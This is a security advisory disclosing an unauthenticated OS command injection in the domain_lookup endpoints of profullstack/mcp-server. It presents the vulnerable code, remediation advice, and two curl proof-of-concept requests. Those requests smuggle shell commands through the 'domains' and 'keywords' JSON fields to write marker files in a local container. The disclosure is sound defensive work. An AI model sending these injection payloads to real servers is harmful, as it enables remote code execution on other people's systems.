<html> <body> <!--StartFragment--><html><head></head><body><h1>Security Advisory: OS Command Injection in <code>profullstack/mcp-server</code> <code>domain_lookup</code> Module</h1> Field | Value -- | -- Project | profullstack/mcp-server Repository | https://github.com/profullstack/mcp-server Affected Commit | 2e8ea913573610667ad54e31dba2e8198ebf7cf9 Affected Module | mcp_modules/domain_lookup Affected Endpoints | POST /domain-lookup/check, POST /domain-lookup/bulk Vulnerability Type | CWE-78: OS Command Injection CVSS 3.1 Score | 9.8 (Critical) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Authentication Required | None Default Network Exposure | Bind address 0.0.0.0, no global authentication middleware Validated | 2026-04-21 (initial), 2026-04-28 (re-confirmed) <hr> <h2>Summary</h2> <p>The <code>domain_lookup</code> module assembles a shell command string by concatenating user-controlled input (<code>domains</code> / <code>keywords</code>) and passes it to <code>execAsync()</code>. Both HTTP endpoints reach the same sink. Because there is no argument quoting, escaping, or allowlist — and no authentication on the server — an unauthenticated remote attacker can execute arbitrary OS commands as the server process.</p> <hr> <h2>Affected Code</h2> <ul> <li><code>index.js:27</code> — server binds to <code>0.0.0.0</code>, no global auth middleware.</li> <li><code>mcp_modules/domain_lookup/index.js:52</code> — registers <code>POST /domain-lookup/check</code>.</li> <li><code>mcp_modules/domain_lookup/index.js:55</code> — registers <code>POST /domain-lookup/bulk</code>.</li> <li><code>mcp_modules/domain_lookup/src/service.js:19, :20</code> — <code>buildTldxCommand()</code> concatenates user input into the shell string.</li> <li><code>mcp_modules/domain_lookup/src/service.js:114, :115, :142</code> — <code>execAsync(command)</code> sink reached from both routes.</li> </ul> <hr> <h2>Vulnerable Code</h2> <p><strong>File:</strong> <code>mcp_modules/domain_lookup/src/service.js</code></p> <p><strong>Step 1 — User input concatenated directly into a shell string:</strong></p> <pre><code class="language-js">buildTldxCommand(keywords, options = {}) { let command = `tldx ${keywords.join(' ')}`; if (options.prefixes?.length) { command += ` --prefixes ${options.prefixes.join(',')}`; } } </code></pre> <p><strong>Step 2 — That shell string is executed as-is:</strong></p> <pre><code class="language-js">async checkDomainAvailability(domains, options = {}) { try { const command = this.buildTldxCommand(domains, options); const { stdout, stderr } = await execAsync(command); </code></pre> <p>There is no sanitization between Step 1 and Step 2. Shell metacharacters (<code>;</code>, <code>|</code>, <code>$()</code>, etc.) in user input are interpreted by <code>/bin/sh</code> at execution time.</p> <hr> <h2>Proof of Concept</h2> <p>Tested against a local Docker build of the affected commit (<code>0.0.0.0:13000-&gt;3000/tcp</code>).</p> <h3>PoC A — <code>POST /domain-lookup/check</code></h3> <p><strong>Request:</strong></p> <pre><code class="language-bash">curl -X POST http://localhost:13000/domain-lookup/check \ -H 'Content-Type: application/json' \ -d '{"domains":["example.com; echo final_check_poc &gt; /tmp/verify-exports/final_check.txt; #"]}' </code></pre> <p><strong>Response:</strong></p> <pre><code>HTTP/1.1 500 Internal Server Error access-control-allow-origin: * content-type: application/json Date: Tue, 21 Apr 2026 04:32:39 GMT {"error":"tldx command failed: tldx command failed: /bin/sh: tldx: not found\n"} </code></pre> <p><strong>Side effect confirmed inside container:</strong></p> <pre><code>$ cat /tmp/verify-exports/final_check.txt final_check_poc </code></pre> <h3>PoC B — <code>POST /domain-lookup/bulk</code></h3> <p><strong>Request:</strong></p> <pre><code class="language-bash">curl -X POST http://localhost:13000/domain-lookup/bulk \ -H 'Content-Type: application/json' \ -d '{"keywords":["safe","x; echo final_bulk_poc &gt; /tmp/verify-exports/final_bulk.txt; #"]}' </code></pre> <p><strong>Response:</strong></p> <pre><code>HTTP/1.1 500 Internal Server Error access-control-allow-origin: * content-type: application/json Date: Tue, 21 Apr 2026 04:32:40 GMT {"error":"Bulk domain check failed: Bulk domain check failed: /bin/sh: tldx: not found\n"} </code></pre> <p><strong>Side effect confirmed inside container:</strong></p> <pre><code>$ cat /tmp/verify-exports/final_bulk.txt final_bulk_poc </code></pre> <h3>Note on HTTP 500</h3> <p>Both requests return HTTP 500 because <code>tldx</code> is not installed in the test container. The injected commands are interpreted by the shell <strong>before</strong> <code>tldx</code> is invoked. The marker files confirm that attacker-controlled commands executed successfully despite the 500 response. In a production environment where <code>tldx</code> is installed, both the intended function and the injected commands execute.</p> <hr> <h2>Impact</h2> <ul> <li>Unauthenticated remote code execution as the server process UID.</li> <li>Full read/write access to any file the server process can access.</li> <li>Potential for outbound connections, credential theft, persistence, and lateral movement.</li> <li>Reproducible with a single unauthenticated HTTP POST to either of two documented endpoints.</li> </ul> <hr> <h2>Suggested Remediation</h2> <ol> <li>Replace <code>execAsync(command)</code> with <code>child_process.execFile</code> or <code>spawn('tldx', [keyword1, keyword2, ...])</code> — pass arguments as an array, never as a concatenated shell string.</li> <li>Validate all domain/keyword input against a strict allowlist (RFC 1035 hostname syntax) before invoking the external binary; reject any input containing shell metacharacters.</li> <li>Add a global authentication middleware so all HTTP-exposed modules are not callable anonymously.</li> <li>Default the server bind address to <code>127.0.0.1</code> and require explicit opt-in for non-loopback bindings.</li> </ol> <hr> <h2>Verification Environment</h2> <ul> <li>Local Docker container only; no third-party deployment was tested.</li> <li>The container does not include the <code>tldx</code> binary; this is intentional for safe local PoC and does not affect exploitability.</li> </ul></body></html><!--EndFragment--> </body> </html>

الإصدارات المتأثرة

All versions < 0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

المراجع